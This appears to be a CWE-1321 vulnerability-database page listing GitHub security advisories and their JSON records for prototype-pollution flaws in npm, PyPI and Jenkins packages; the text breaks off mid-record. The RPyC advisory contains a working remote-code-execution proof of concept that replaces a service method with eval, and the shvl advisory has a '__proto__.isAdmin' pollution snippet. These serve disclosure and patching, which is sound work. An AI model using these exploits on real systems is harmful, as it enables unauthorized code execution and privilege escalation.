CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
785 vulnerabilities reference this CWE, most recent first.
GHSA-PGMG-GF5P-54J8
Vulnerability from github – Published: 2021-05-06 18:26 – Updated: 2023-09-07 00:00All versions of package gammautils up to and including version 0.0.81 are vulnerable to Prototype Pollution via the deepSet and deepMerge functions.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "gammautils"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.81"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7718"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-05T18:05:47Z",
"nvd_published_at": "2020-09-01T10:15:00Z",
"severity": "CRITICAL"
},
"details": "All versions of package gammautils up to and including version 0.0.81 are vulnerable to Prototype Pollution via the `deepSet` and `deepMerge` functions.",
"id": "GHSA-pgmg-gf5p-54j8",
"modified": "2023-09-07T00:00:21Z",
"published": "2021-05-06T18:26:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7718"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-GAMMAUTILS-598670"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in gammautils"
}
GHSA-PH28-WWFJ-FV7F
Vulnerability from github – Published: 2022-05-14 00:01 – Updated: 2022-05-25 22:53This affects the package sds from 0.0.0. The library could be tricked into adding or modifying properties of the Object.prototype by abusing the set function located in js/set.js. Note: This vulnerability derives from an incomplete fix to CVE-2020-7618
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "sds"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "4.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-25862"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-05-25T22:53:54Z",
"nvd_published_at": "2022-05-13T20:15:00Z",
"severity": "HIGH"
},
"details": "This affects the package sds from 0.0.0. The library could be tricked into adding or modifying properties of the Object.prototype by abusing the set function located in js/set.js. **Note:** This vulnerability derives from an incomplete fix to CVE-2020-7618",
"id": "GHSA-ph28-wwfj-fv7f",
"modified": "2022-05-25T22:53:54Z",
"published": "2022-05-14T00:01:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7618"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25862"
},
{
"type": "PACKAGE",
"url": "https://github.com/monsterkodi/sds"
},
{
"type": "WEB",
"url": "https://github.com/monsterkodi/sds/blob/master/js/set.js"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-SDS-2385944"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in sds"
}
GHSA-PHH3-2P9M-W6J5
Vulnerability from github – Published: 2024-05-02 15:30 – Updated: 2024-07-03 20:11Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically sets the Java system property hudson.model.ParametersAction.keepUndefinedParameters whenever a build is triggered from a release tag with the 'Svn-Partial Release Manager' SCM. Doing so disables the fix for SECURITY-170 / CVE-2016-3721.
As of publication of this advisory, there is no fix.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:partial-release-manager"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-34148"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-03T19:37:35Z",
"nvd_published_at": "2024-05-02T14:15:10Z",
"severity": "MODERATE"
},
"details": "Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically sets the Java system property `hudson.model.ParametersAction.keepUndefinedParameters` whenever a build is triggered from a release tag with the \u0027Svn-Partial Release Manager\u0027 SCM. Doing so disables the fix for [SECURITY-170](https://www.jenkins.io/security/advisory/2016-05-11/#arbitrary-build-parameters-are-passed-to-build-scripts-as-environment-variables) / CVE-2016-3721.\n\nAs of publication of this advisory, there is no fix.",
"id": "GHSA-phh3-2p9m-w6j5",
"modified": "2024-07-03T20:11:11Z",
"published": "2024-05-02T15:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34148"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2024-05-02/#SECURITY-3331"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/05/02/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Jenkins Subversion Partial Release Manager Plugin programmatically disables the fix for CVE-2016-3721 "
}
GHSA-PJ4G-4488-WMXM
Vulnerability from github – Published: 2021-02-17 19:50 – Updated: 2021-09-27 22:48Impact
Version 4.1.0 of RPyC has a vulnerability that affects custom RPyC services making it susceptible to authenticated remote attacks.
Patches
Git commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected.
Workarounds
The commit d818ecc83a92548994db75a0e9c419c7bce680d6 could be used as a patch to add the missing access check.
References
CVE-2019-16328 RPyC Security Documentation
For more information
If you have any questions or comments about this advisory: * Open an issue using GitHub
Proof of Concept
import logging
import rpyc
import tempfile
from subprocess import Popen, PIPE
import unittest
PORT = 18861
SERVER_SCRIPT = f"""#!/usr/bin/env python
import rpyc
from rpyc.utils.server import ThreadedServer, ThreadPoolServer
from rpyc import SlaveService
import rpyc
class Foe(object):
foo = "bar"
class Fee(rpyc.Service):
exposed_Fie = Foe
def exposed_nop(self):
return
if __name__ == "__main__":
server = ThreadedServer(Fee, port={PORT}, auto_register=False)
thd = server.start()
"""
def setattr_orig(target, attrname, codeobj):
setattr(target, attrname, codeobj)
def myeval(self=None, cmd="__import__('sys')"):
return eval(cmd)
def get_code(obj_codetype, func, filename=None, name=None):
func_code = func.__code__
arg_names = ['co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize', 'co_flags',
'co_code', 'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name', 'co_firstlineno',
'co_lnotab', 'co_freevars', 'co_cellvars']
codetype_args = [getattr(func_code, n) for n in arg_names]
if filename:
codetype_args[arg_names.index('co_filename')] = filename
if name:
codetype_args[arg_names.index('co_name')] = name
mycode = obj_codetype(*codetype_args)
return mycode
def _vercmp_gt(ver1, ver2):
ver1_gt_ver2 = False
for i, v1 in enumerate(ver1):
v2 = ver2[i]
if v1 > v2:
ver1_gt_ver2 = True
break
elif v1 == v2:
continue
else: # v1 < v2
break
return ver1_gt_ver2
@unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), "unaffected version")
class Test_InfoDisclosure_Service(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.logger = logging.getLogger('rpyc')
cls.logger.setLevel(logging.DEBUG) # NOTSET only traverses until another level is found, so DEBUG is preferred
cls.hscript = tempfile.NamedTemporaryFile()
cls.hscript.write(SERVER_SCRIPT.encode())
cls.hscript.flush()
while cls.hscript.file.tell() != len(SERVER_SCRIPT):
pass
cls.server = Popen(["python", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True)
cls.conn = rpyc.connect("localhost", PORT)
@classmethod
def tearDownClass(cls):
cls.conn.close()
cls.logger.info(cls.server.stdout.read())
cls.logger.info(cls.server.stderr.read())
cls.server.kill()
cls.hscript.close()
def netref_getattr(self, netref, attrname):
# PoC CWE-358: abuse __cmp__ function that was missing a security check
handler = rpyc.core.consts.HANDLE_CMP
return self.conn.sync_request(handler, netref, attrname, '__getattribute__')
def test_1_modify_nop(self):
# create netrefs for builtins and globals that will be used to construct on remote
remote_svc_proto = self.netref_getattr(self.conn.root, '_protocol')
remote_dispatch = self.netref_getattr(remote_svc_proto, '_dispatch_request')
remote_class_globals = self.netref_getattr(remote_dispatch, '__globals__')
remote_modules = self.netref_getattr(remote_class_globals['sys'], 'modules')
_builtins = remote_modules['builtins']
remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)}
# populate globals for CodeType calls on remote
remote_globals = remote_builtins['dict']()
for name, netref in remote_builtins.items():
remote_globals[name] = netref
for name, netref in self.netref_getattr(remote_modules, 'items')():
remote_globals[name] = netref
# create netrefs for types to create remote function malicously
remote_types = remote_builtins['__import__']("types")
remote_types_CodeType = self.netref_getattr(remote_types, 'CodeType')
remote_types_FunctionType = self.netref_getattr(remote_types, 'FunctionType')
# remote eval function constructed
remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename='test_code.py', name='__code__')
remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals)
# PoC CWE-913: modify the exposed_nop of service
# by binding various netrefs in this execution frame, they are cached in
# the remote address space. setattr and eval functions are cached for the life
# of the netrefs in the frame. A consequence of Netref classes inheriting
# BaseNetref, each object is cached under_local_objects. So, we are able
# to construct arbitrary code using types and builtins.
# use the builtin netrefs to modify the service to use the constructed eval func
remote_setattr = remote_builtins['setattr']
remote_type = remote_builtins['type']
remote_setattr(remote_type(self.conn.root), 'exposed_nop', remote_eval)
# show that nop was replaced by eval to complete the PoC
remote_sys = self.conn.root.nop('__import__("sys")')
remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
self.assertEqual(type(remote_sys).__name__, 'builtins.module')
self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
self.assertIn('rpyc/utils/server.py', remote_stack)
def test_2_new_conn_impacted(self):
# demostrate impact and scope of vuln for new connections
self.conn.close()
self.conn = rpyc.connect("localhost", PORT)
# show new conn can still use nop as eval
remote_sys = self.conn.root.nop('__import__("sys")')
remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
self.assertEqual(type(remote_sys).__name__, 'builtins.module')
self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
self.assertIn('rpyc/utils/server.py', remote_stack)
if __name__ == "__main__":
unittest.main()
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rpyc"
},
"ranges": [
{
"events": [
{
"introduced": "4.1.0"
},
{
"fixed": "4.1.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"4.1.0"
]
}
],
"aliases": [
"CVE-2019-16328"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-285"
],
"github_reviewed": true,
"github_reviewed_at": "2021-02-17T19:50:44Z",
"nvd_published_at": "2019-10-03T20:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\nVersion 4.1.0 of RPyC has a vulnerability that affects custom RPyC services making it susceptible to authenticated remote attacks.\n\n### Patches\nGit commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected.\n\n### Workarounds\nThe commit `d818ecc83a92548994db75a0e9c419c7bce680d6` could be used as a patch to add the missing access check.\n\n### References\n[CVE-2019-16328](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16328)\n[RPyC Security Documentation](https://rpyc.readthedocs.io/en/latest/docs/security.html#security)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue using [GitHub](https://github.com/tomerfiliba-org/rpyc)\n\n### Proof of Concept\n```\nimport logging\nimport rpyc\nimport tempfile\nfrom subprocess import Popen, PIPE\nimport unittest\n\n\nPORT = 18861\nSERVER_SCRIPT = f\"\"\"#!/usr/bin/env python\nimport rpyc\nfrom rpyc.utils.server import ThreadedServer, ThreadPoolServer\nfrom rpyc import SlaveService\nimport rpyc\n\n\nclass Foe(object):\n foo = \"bar\"\n\n\nclass Fee(rpyc.Service):\n exposed_Fie = Foe\n\n def exposed_nop(self):\n return\n\n\nif __name__ == \"__main__\":\n server = ThreadedServer(Fee, port={PORT}, auto_register=False)\n thd = server.start()\n\"\"\"\n\n\ndef setattr_orig(target, attrname, codeobj):\n setattr(target, attrname, codeobj)\n\n\ndef myeval(self=None, cmd=\"__import__(\u0027sys\u0027)\"):\n return eval(cmd)\n\n\ndef get_code(obj_codetype, func, filename=None, name=None):\n func_code = func.__code__\n arg_names = [\u0027co_argcount\u0027, \u0027co_posonlyargcount\u0027, \u0027co_kwonlyargcount\u0027, \u0027co_nlocals\u0027, \u0027co_stacksize\u0027, \u0027co_flags\u0027,\n \u0027co_code\u0027, \u0027co_consts\u0027, \u0027co_names\u0027, \u0027co_varnames\u0027, \u0027co_filename\u0027, \u0027co_name\u0027, \u0027co_firstlineno\u0027,\n \u0027co_lnotab\u0027, \u0027co_freevars\u0027, \u0027co_cellvars\u0027]\n\n codetype_args = [getattr(func_code, n) for n in arg_names]\n if filename:\n codetype_args[arg_names.index(\u0027co_filename\u0027)] = filename\n if name:\n codetype_args[arg_names.index(\u0027co_name\u0027)] = name\n mycode = obj_codetype(*codetype_args)\n return mycode\n\n\ndef _vercmp_gt(ver1, ver2):\n ver1_gt_ver2 = False\n for i, v1 in enumerate(ver1):\n v2 = ver2[i]\n if v1 \u003e v2:\n ver1_gt_ver2 = True\n break\n elif v1 == v2:\n continue\n else: # v1 \u003c v2\n break\n return ver1_gt_ver2\n\n\n@unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), \"unaffected version\")\nclass Test_InfoDisclosure_Service(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n\n cls.logger = logging.getLogger(\u0027rpyc\u0027)\n cls.logger.setLevel(logging.DEBUG) # NOTSET only traverses until another level is found, so DEBUG is preferred\n cls.hscript = tempfile.NamedTemporaryFile()\n cls.hscript.write(SERVER_SCRIPT.encode())\n cls.hscript.flush()\n while cls.hscript.file.tell() != len(SERVER_SCRIPT):\n pass\n cls.server = Popen([\"python\", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True)\n cls.conn = rpyc.connect(\"localhost\", PORT)\n\n @classmethod\n def tearDownClass(cls):\n cls.conn.close()\n cls.logger.info(cls.server.stdout.read())\n cls.logger.info(cls.server.stderr.read())\n cls.server.kill()\n cls.hscript.close()\n\n def netref_getattr(self, netref, attrname):\n # PoC CWE-358: abuse __cmp__ function that was missing a security check\n handler = rpyc.core.consts.HANDLE_CMP\n return self.conn.sync_request(handler, netref, attrname, \u0027__getattribute__\u0027)\n\n def test_1_modify_nop(self):\n # create netrefs for builtins and globals that will be used to construct on remote\n remote_svc_proto = self.netref_getattr(self.conn.root, \u0027_protocol\u0027)\n remote_dispatch = self.netref_getattr(remote_svc_proto, \u0027_dispatch_request\u0027)\n remote_class_globals = self.netref_getattr(remote_dispatch, \u0027__globals__\u0027)\n remote_modules = self.netref_getattr(remote_class_globals[\u0027sys\u0027], \u0027modules\u0027)\n _builtins = remote_modules[\u0027builtins\u0027]\n remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)}\n\n # populate globals for CodeType calls on remote\n remote_globals = remote_builtins[\u0027dict\u0027]()\n for name, netref in remote_builtins.items():\n remote_globals[name] = netref\n for name, netref in self.netref_getattr(remote_modules, \u0027items\u0027)():\n remote_globals[name] = netref\n\n # create netrefs for types to create remote function malicously\n remote_types = remote_builtins[\u0027__import__\u0027](\"types\")\n remote_types_CodeType = self.netref_getattr(remote_types, \u0027CodeType\u0027)\n remote_types_FunctionType = self.netref_getattr(remote_types, \u0027FunctionType\u0027)\n\n # remote eval function constructed\n remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename=\u0027test_code.py\u0027, name=\u0027__code__\u0027)\n remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals)\n # PoC CWE-913: modify the exposed_nop of service\n # by binding various netrefs in this execution frame, they are cached in\n # the remote address space. setattr and eval functions are cached for the life\n # of the netrefs in the frame. A consequence of Netref classes inheriting\n # BaseNetref, each object is cached under_local_objects. So, we are able\n # to construct arbitrary code using types and builtins.\n\n # use the builtin netrefs to modify the service to use the constructed eval func\n remote_setattr = remote_builtins[\u0027setattr\u0027]\n remote_type = remote_builtins[\u0027type\u0027]\n remote_setattr(remote_type(self.conn.root), \u0027exposed_nop\u0027, remote_eval)\n\n # show that nop was replaced by eval to complete the PoC\n remote_sys = self.conn.root.nop(\u0027__import__(\"sys\")\u0027)\n remote_stack = self.conn.root.nop(\u0027\"\".join(__import__(\"traceback\").format_stack())\u0027)\n self.assertEqual(type(remote_sys).__name__, \u0027builtins.module\u0027)\n self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)\n self.assertIn(\u0027rpyc/utils/server.py\u0027, remote_stack)\n\n def test_2_new_conn_impacted(self):\n # demostrate impact and scope of vuln for new connections\n self.conn.close()\n self.conn = rpyc.connect(\"localhost\", PORT)\n # show new conn can still use nop as eval\n remote_sys = self.conn.root.nop(\u0027__import__(\"sys\")\u0027)\n remote_stack = self.conn.root.nop(\u0027\"\".join(__import__(\"traceback\").format_stack())\u0027)\n self.assertEqual(type(remote_sys).__name__, \u0027builtins.module\u0027)\n self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)\n self.assertIn(\u0027rpyc/utils/server.py\u0027, remote_stack)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n```",
"id": "GHSA-pj4g-4488-wmxm",
"modified": "2021-09-27T22:48:17Z",
"published": "2021-02-17T19:50:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tomerfiliba-org/rpyc/security/advisories/GHSA-pj4g-4488-wmxm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16328"
},
{
"type": "PACKAGE",
"url": "https://github.com/tomerfiliba-org/rpyc"
},
{
"type": "WEB",
"url": "https://github.com/tomerfiliba/rpyc"
},
{
"type": "WEB",
"url": "https://rpyc.readthedocs.io/en/latest/docs/security.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00046.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00004.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Dynamic modification of RPyC service due to missing security check"
}
GHSA-PMH2-WPJM-FJ45
Vulnerability from github – Published: 2024-05-30 18:34 – Updated: 2024-06-06 16:49Versions of the package mysql2 before 3.9.8 are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using nestTables.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "mysql2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.9.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-21512"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-30T18:34:32Z",
"nvd_published_at": "2024-05-29T05:16:08Z",
"severity": "HIGH"
},
"details": "Versions of the package mysql2 before 3.9.8 are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using nestTables.",
"id": "GHSA-pmh2-wpjm-fj45",
"modified": "2024-06-06T16:49:01Z",
"published": "2024-05-30T18:34:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21512"
},
{
"type": "WEB",
"url": "https://github.com/sidorares/node-mysql2/pull/2702"
},
{
"type": "WEB",
"url": "https://github.com/sidorares/node-mysql2/commit/efe3db527a2c94a63c2d14045baba8dfefe922bc"
},
{
"type": "WEB",
"url": "https://gist.github.com/domdomi3/e9f0f9b9b1ed6bfbbc0bea87c5ca1e4a"
},
{
"type": "PACKAGE",
"url": "https://github.com/sidorares/node-mysql2"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-7176010"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6861580"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "mysql2 vulnerable to Prototype Pollution"
}
GHSA-PP3H-G655-HHFP
Vulnerability from github – Published: 2024-07-01 15:32 – Updated: 2024-07-03 18:47amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function setValue. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
{
"affected": [],
"aliases": [
"CVE-2024-39003"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-01T13:15:05Z",
"severity": "HIGH"
},
"details": "amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function setValue. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
"id": "GHSA-pp3h-g655-hhfp",
"modified": "2024-07-03T18:47:35Z",
"published": "2024-07-01T15:32:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39003"
},
{
"type": "WEB",
"url": "https://gist.github.com/mestrtee/02091aa86c6c14c29b9703642439dd03"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-PP75-XFPW-37G9
Vulnerability from github – Published: 2021-05-10 19:16 – Updated: 2021-04-19 22:57"The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition."
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "grpc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.24.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@grpc/grpc-js"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7768"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-915"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-19T22:57:05Z",
"nvd_published_at": "2020-11-11T11:15:00Z",
"severity": "HIGH"
},
"details": "\"The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition.\"",
"id": "GHSA-pp75-xfpw-37g9",
"modified": "2021-04-19T22:57:05Z",
"published": "2021-05-10T19:16:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7768"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc-node/pull/1605"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc-node/pull/1606"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc-node/releases/tag/grpc%401.24.4"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038819"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-GRPC-598671"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-GRPCGRPCJS-1038818"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/@grpc/grpc-js"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/grpc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in grpc and @grpc/grpc-js"
}
GHSA-PQWC-3VHW-QCVQ
Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2024-02-01 21:00Overview
Prototype pollution vulnerability in 'shvl' versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.
Details
The NPM module 'shvl' can be abused by Prototype Pollution vulnerability since the function 'set()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.
PoC Details
The 'set()' function accepts four arguments object, path, val, obj. Due to the absence of validation, at values passed into path, val arguments, an attacker can supply a malicious value by adjusting the path value to include the __proto__ property. Since there is no validation before assigning property to check whether the assigned path is the Object's own property or not, the property isAdmin will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate isAdmin the valued would be substituted as "true" as it had been polluted.
const shvl = require('shvl');
var obj = {}
console.log("Before : " + obj.isAdmin);
shvl.set(obj, '__proto__.isAdmin', true);
console.log("After : " + obj.isAdmin);
Affected Environments
1.0.0-2.0.1
Remediation
There are a couple of ways to mitigate prototype pollution vulnerabilities, for example: Most of the cases can be solved by freezing an object which doesn’t allow to add, remove, or change its properties. Validating the JSON input with schema validation, this guarantees that the JSON input contains only predefined attributes. We can change the objects, so they won’t have any prototype association by using “Object.create”.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.0.1"
},
"package": {
"ecosystem": "npm",
"name": "shvl"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "2.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-28278"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-01T21:00:24Z",
"nvd_published_at": "2020-12-29T18:15:00Z",
"severity": "CRITICAL"
},
"details": "### Overview\nPrototype pollution vulnerability in \u0027shvl\u0027 versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module \u0027shvl\u0027 can be abused by Prototype Pollution vulnerability since the function \u0027set()\u0027 did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC Details\nThe \u0027set()\u0027 function accepts four arguments `object, path, val, obj`. Due to the absence of validation, at values passed into `path, val` arguments, an attacker can supply a malicious value by adjusting the `path` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `path` is the Object\u0027s own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst shvl = require(\u0027shvl\u0027);\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\nshvl.set(obj, \u0027__proto__.isAdmin\u0027, true);\nconsole.log(\"After : \" + obj.isAdmin);\n```\n\n### Affected Environments\n1.0.0-2.0.1\n\n### Remediation\nThere are a couple of ways to mitigate prototype pollution vulnerabilities, for example: Most of the cases can be solved by freezing an object which doesn\u2019t allow to add, remove, or change its properties. Validating the JSON input with schema validation, this guarantees that the JSON input contains only predefined attributes. We can change the objects, so they won\u2019t have any prototype association by using \u201cObject.create\u201d.",
"id": "GHSA-pqwc-3vhw-qcvq",
"modified": "2024-02-01T21:00:24Z",
"published": "2022-05-24T17:37:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28278"
},
{
"type": "WEB",
"url": "https://github.com/robinvdvleuten/shvl/issues/34"
},
{
"type": "WEB",
"url": "https://github.com/robinvdvleuten/shvl/pull/36"
},
{
"type": "WEB",
"url": "https://github.com/robinvdvleuten/shvl/commit/513c0848774dfb114ad0d0554abf7927cfdd569e"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20210320222933/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28278"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "shvl vulnerable to prototype pollution"
}
GHSA-PRC2-X3QX-38M9
Vulnerability from github – Published: 2026-06-18 00:32 – Updated: 2026-06-18 00:32ThingsBoard contains a prototype pollution vulnerability which may lead to arbitrary code execution within a sandboxed context by a user who can log in to the affected product with the tenant administrator privilege (TENANT_ADMIN).
{
"affected": [],
"aliases": [
"CVE-2026-53676"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-17T23:17:04Z",
"severity": "HIGH"
},
"details": "ThingsBoard contains a prototype pollution vulnerability which may lead to arbitrary code execution within a sandboxed context by a user who can log in to the affected product with the tenant administrator privilege (TENANT_ADMIN).",
"id": "GHSA-prc2-x3qx-38m9",
"modified": "2026-06-18T00:32:37Z",
"published": "2026-06-18T00:32:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53676"
},
{
"type": "WEB",
"url": "https://github.com/thingsboard/thingsboard/pull/15600"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN16937365"
},
{
"type": "WEB",
"url": "https://thingsboard.io/docs/releases/releases-table"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
